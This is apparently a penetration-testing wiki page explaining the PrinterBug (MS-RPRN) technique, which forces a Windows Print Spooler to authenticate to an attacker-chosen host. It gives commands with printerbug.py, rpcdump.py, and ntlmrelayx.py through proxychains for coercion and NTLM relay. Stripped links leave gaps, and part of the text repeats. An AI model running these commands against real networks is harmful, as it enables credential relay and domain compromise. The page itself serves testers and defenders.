MS-RPRN abuse (PrinterBug)

PreviousMS-EFSR abuse (PetitPotam)NextMS-FSRVP abuse (ShadowCoerce)

Last updated 1 year ago

Was this helpful?

MS-RPRN abuse (PrinterBug)

Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments ().

The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with to elicit incoming authentications made over HTTP which heightens capabilities.

The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \pipe\spoolss named pipe through the IPC$ share.

Practice

Remotely checking if the spooler is available can be done with (Powershell) or with (Python).

The spooler service can be triggered with or (C#). There are many alternatives available publicly on the Internet.

Trigger the spooler service

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

Check if the spooler service is available

rpcdump.py $TARGET | grep -A 6 "spoolsv"

Check if the spooler service is available

In the situation where the tester doesn't have any credentials, it is still possible to and trigger the spooler service of a target via a SOCKS proxy.

ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'

Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of . For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.

Resources

PreviousMS-EFSR abuse (PetitPotam)NextMS-FSRVP abuse (ShadowCoerce)

Last updated 1 year ago

Was this helpful?

Theory

The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with to elicit incoming authentications made over HTTP which heightens capabilities.

Practice

Remotely checking if the spooler is available can be done with (Powershell) or with (Python).

The spooler service can be triggered with or (C#). There are many alternatives available publicly on the Internet.

Trigger the spooler service

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

Check if the spooler service is available

rpcdump.py $TARGET | grep -A 6 "spoolsv"

Check if the spooler service is available

In the situation where the tester doesn't have any credentials, it is still possible to and trigger the spooler service of a target via a SOCKS proxy.

ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'